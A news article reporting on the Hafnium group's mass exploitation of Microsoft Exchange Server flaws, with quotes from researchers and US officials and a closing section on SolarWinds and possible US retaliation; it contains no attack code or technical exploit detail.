An aggressive Chinese hacking group hacked 30,000 American governmental and commercial establishments via a Microsoft Exchange Server vulnerability.
The Wall Street Journal reported that the number of affected organizations could go up to 250,000. The hackers had access to the systems for two months before Microsoft released a patch on March 2nd to resolve the problem.
In the three days since the communist Chinese hacking crew, Hafnium increased its attack on any vulnerable systems using the Microsoft Exchange Server’s unpatched version. Hafnium left a tool called ‘web shell in every hacking incident.’ It can be accessed over the internet and gives hackers administrative access to target systems.
Cybersecurity company Volexity discovered the Microsoft vulnerabilities during Chinese hacking attempts on Jan. 6. In an interview with KrebsOnSecurity, Volexity president Steven Adair said that the Chinese hackers are now trying to break into as many systems as possible before Microsoft installs patches and plugs vulnerabilities.
“We’ve worked on dozens of cases so far where web shells were put on the victim system back on Feb. 28 [before Microsoft announced its patches], all the way up to today… Even if you patched the same day Microsoft published its patches, there’s still a high chance there is a web shell on your server.”
“The truth is, if you’re running Exchange and you haven’t patched this yet, there’s a very high chance that your organization is already compromised,” Adair told KrebsOnSecurity.
According to Andy Greenberg, cybersecurity reporter at Wired, he was told the hacking is “massive” by a national security official who knows about the investigation into the breach. Thousands of servers worldwide are being compromised each hour.
White House press secretary Jen Psaki said that the hack could have “far-reaching impacts” and that the government is concerned with many compromised companies.
U.S. Cybersecurity & Infrastructure Security Agency (CISA) has instructed all government departments running Microsoft Exchange servers to either disconnect from the networks or update software as soon as possible.
White House National Security Advisor Jake Sullivan tweeted that the administration is tracking the hack’s potential impact on American think tanks and defense industrial bases. He encouraged network owners to deploy the Microsoft patch immediately and secure their systems.
Rising Chinese and Russian cyberattacks
The communist Chinese cyberattacks come a few months after Russian hackers allegedly breached SolarWinds Corp. and potentially affected thousands of entities, including government departments. Given the rising cyber attacks from countries like Russia and communist China, the Biden administration said it’s planning a major retaliation against Russia in the coming weeks.
The New York Times reported that Washington is preparing to implement a series of covert actions against Russian networks to send a message to Putin and its intelligence agencies. However, the Biden administration made no such promise to retaliate against communist China.
“We are undertaking a whole of government response to assess and address the impact… This is an active threat still developing, and we urge network operators to take it very seriously,” a White House official emailed.
Charles Carmakal, a senior vice president at cybersecurity company FireEye Inc, said that the good guys are getting tired. The U.S. might act against Chinese networks, given the recent consistent attacks on American companies and other affiliated entities.